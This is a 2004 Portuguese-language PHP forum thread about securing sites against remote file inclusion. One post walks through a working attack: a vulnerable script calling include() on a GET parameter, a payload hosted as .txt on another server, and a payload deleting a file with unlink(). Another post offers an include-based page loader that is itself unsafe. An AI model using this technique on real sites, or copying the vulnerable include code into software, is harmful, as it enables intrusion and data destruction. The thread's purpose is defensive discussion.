42 replies to this topic

[Stormbringer]

exato, nao dá certo por causa das permissões do arquivo, vc nao pode querer setar um chmod se vc nao tem permissao do "owner" para tal, hehehe

o perigo reside mais no que diz respeito a banco de dados, pois geralmente vc jah carregou os dados da conexao, manipulaçao de arquivos é mais seguro, pois depende da permissao inicial dos arquivos que se quer "atacar"...

dica: tomem as precauções, mas nao tentem achar pelo em ovo, nem testar "habilidades" de ataque, pq crime digital tb pode gerar consequencias desagradaveis para o infrator

[Gabriel_HM]

Não pensei que daria em tanto esse tópico . Mas no caso do cara que eu conheço, ele hackeia o servidor pra fazer bots (provavelmente ele deve pegar o ip do servidor ou coisa assim, não sei).

Bom, seria legal se ouvesse uma parte específica no fórum para tratar de segurança, acho que é um assunto que está sempre bem comentado e segurança nunca é de mais.
Pensei em os Admins fazer uma parte tipo a do tutoriais... é só uma sugestão.

valew

[php-hack]

Um...Muito boa essa Duvida...sera q conseguem inibir os ataques??

mas podem ficar trenquilos que site sem conteudo nem sao alvos deles msm....

[RainMaker]

"Um...Muito boa essa Duvida...sera q conseguem inibir os ataques??

mas podem ficar trenquilos que site sem conteudo nem sao alvos deles msm.... "

Hehehehe será que vc quiz dizer q nossos sites n tem conteúdo?
---------------------

Outra coisa, como inibir akele esquema do login? quer dizer, ja testei aki no meu e n funfo esse ataque.
Esse esquema de impedir o include eu to usando, testado e aprovado!
Eu so to achando q tem gt que quer aprender a proteger pages, enquanto outras nem tanto...

vlw, mt bom esse tópico

[Prog]

Como inibir? É fácil... coloquem no seu site algo do tipo.

"Site equipado com alarme anti-Hacker." *rs*

Sua página só fica vulneravel se vc falhar na codificação. Este assunto já foi tratado em diversos tópicos.

[juseh]

Voltando ao assunto do começo do post, eu acho q a melhor maneira de proteger o site é assim:

<?
########################
#    Modo de usar    #
########################
// Basta voce modificar as linhas abaixo.
// Salve uma pagina *.php e depois digite:
// http://www.floripajo...=NOME_DA_PAGINA

// Nome da pasta onde ficarao as paginas .php (sem barra no final)
$paginas="paginas";
// Arquivo da pagina inicial
$inicio="home.php";
// Arquivo de erro
$erro="erro.php";

########################
#  Nao Edite Abaixo  #
########################

if(file_exists("$paginas/$pag.php")){
include("$paginas/$pag.php");
}

else if($pag == index  || $pag == home || $pag == ''){
include("$paginas/$inicio");
}

else{
include("$paginas/$erro");
}
########################
#  Nao Edite Acima    #
########################
?>

Não é ruim de atualizar como o swith e é seguro como o q os caras postaram

[Hospedar-se .Com]

é mais fácil você mudar a permissão de alguns programas do seu unix e bloquear agluns comando no php.ini ...

[LucasMS]

foreach($_GET as $key => $value) {

if(eregi("http://", $key)) die("bad string");

}

[ffmm]

Com relação a incluir arquivos externos, existe um pequeno ponto que acho q nao está claro.

Quando vc acessar um arquivo php de um servidor (qualquer site, por exemplo, a wmonline), o que vc vê? o código fonte? não, você vê o resultado do script!
Agora, se vc tem um arquivo (como o Hyoga de Cisne fez), com nome de fode.php e com o conteudo:
<?php
unlink('arquivo.importante');
?>

O que vai contecer quando ele for acessado? ele vai executar a instrução e não retornará nada! então quando ele for incluido de outro servidor, o que será incluido na pagina??? nada!

Então para esses ataques, os arquivos tem normalmente extenção .txt, pois assim ele não é interpretado, e o que o arquivo vai receber no include será o código fonte (que queremos que seja executado).

Exemplo:
arquivo.php (arquivo com falta de segurança):
<?php
$teste = 'num funcionou';
@include($_GET['file']);
echo $teste;
?>

fode.txt (com extenção .txt mesmo!):
<?php
$teste = 'testando: incluir arquivo de outro servidor';
?>

Agora coloque o arquivo.php em um servidor, e fode.txt em outro.
Acesse o arquivo.php com:
http://www.site.com.br/arquivo.php

O que apareceu? "num funcionou".
Agora acesse como:
http://www.site.com....com.br/fode.txt

O que apareceu?


Obs.: essas informações são somente para estudos, a fim de proteger seus próprios scripts. Não saia por aí tentando invadir o site dos outros.

[Luke]

Uma dúvida simples:

qual seria o chmod indicado para dar em um site....soh nos arquivos que devem ser exibidos para os users!?


eu utilizo só o de leitura....

[Hyoga de Cisne]

Amigo mesmo assim não daria certo, veja:
http://www.members.l...ogaans/fode.txt

Url...

http://seusite.com.b...ogaans/fode.txt

Viu, mesmo asism por algum motivo nã dá certo...

nao dá certo... por 1 motivo já exaustivamente comentado aqui: unlink funciona se tem permissao ao arquivo,
chmod funcina se o script é o dono do arquivo ou se tem permissao de "troca de permissoes" dada pelo proprietario do arquivo...

just it

[ffmm]

Sim, por isso é mais usado acessar o banco de dados, mexer nas tabelas, etc..., pois não tem tantas limitações.

Esse tipo de limitação de permissão, etc, eh próprio de sistemas Unix, e mesmo pra um script do servidor fazer isso, eh necessário ter permissão correta!

Outra coisa: a partir disso (incluir arquivos externos) é possível enviar Spam a partir da sua conta, ou seja, a culpa cairía em vc.

[Hospedar-se .Com]

usuário nobody é o culpado, a primeira coisa que fazem, é usarem ele, compilam xpls e executam no servidor, isso depende mais da versão do kernel, nunca use a última versão do kernel, pq sempre tem bug, e use pelo menos uma antes, mas com todas as correções feitas, faça uma filtragem tambem no apache, com os mods (www.apache.org), hehe não vou dar mais dica q se não acaba meu trabalho de arrumar servidores

Edição feita por: Hospedar-se .Com, 12/10/2004, 17:36.